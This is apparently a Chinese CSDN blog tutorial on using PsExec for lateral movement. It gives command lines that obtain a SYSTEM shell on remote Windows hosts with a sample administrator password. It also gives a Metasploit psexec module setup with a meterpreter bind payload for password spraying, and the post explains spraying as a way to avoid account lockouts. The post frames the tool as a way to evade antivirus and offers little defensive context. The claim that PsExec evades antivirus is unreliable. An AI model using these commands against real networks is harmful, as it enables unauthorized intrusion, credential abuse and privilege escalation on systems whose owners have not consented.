横向渗透之PsExec工具使用

本文介绍了Psexec工具的工作原理和使用方法,包括如何利用该工具进行本地提权和横向入侵,以及如何躲避杀毒软件检测。此外,还提到了Metasploit框架中的Psexec模块在密码喷洒攻击中的应用,以及Psexec在其他安全框架中的整合。Psexec的特性使其能直接获取system权限,但同时也可能被用于恶意活动。
摘要由CSDN通过智能技术生成

psexec(微软官方工具)可以躲避检测无视杀毒软件,直接system权限
PsExec是一个轻量级的telnet替代品,它允许您在其他系统上执行进程,
并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。

PsExec的基本原理是:
通过管道在远程目标机器上创建一个psexec服务,
并在本地磁盘中生成一个名为PSEXESVC的二进制文件,
然后通过psexec服务运行命令,运行结束后删除任务。

利用条件

445端口开放,
知道目标账号密码

PsExec下载地址
优点:可以躲避检测无视杀毒软件,直接system权限

https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

基本使用命令

``
PsExec.exe /s cmd # 本地提权,还有一个提权作用,直接system权限

PsExec.exe \127.0.0.1 -u Administrator -p 123qwe@@ /s cmd # 本地提权

PsExec.exe \172.16.1.132 -u Administrator -p 123qwe@@ /s cmd # 横向入侵Windows主机,直接system权限
``

直接返回一个system权限的shell

在这里插入图片描述

Metasploit中的psexec模块
密码喷洒指的是用一个密码对多个账号对目标进行枚举爆破,躲避密码输入错误过多导致封锁账号

利用metasploit进行密码喷洒
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set smbuser user.txt
msf6 exploit(windows/smb/psexec) > set smbpass password.txt
msf6 exploit(windows/smb/psexec) > set rhost 172.16.1.132
msf6 exploit(windows/smb/psexec) > run

成功后直接返回一个system权限的主机上线msf

很多框架的集成了psexec工具,比如CS内网大杀器也结成了这个工具。总之就是牛逼6666

  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值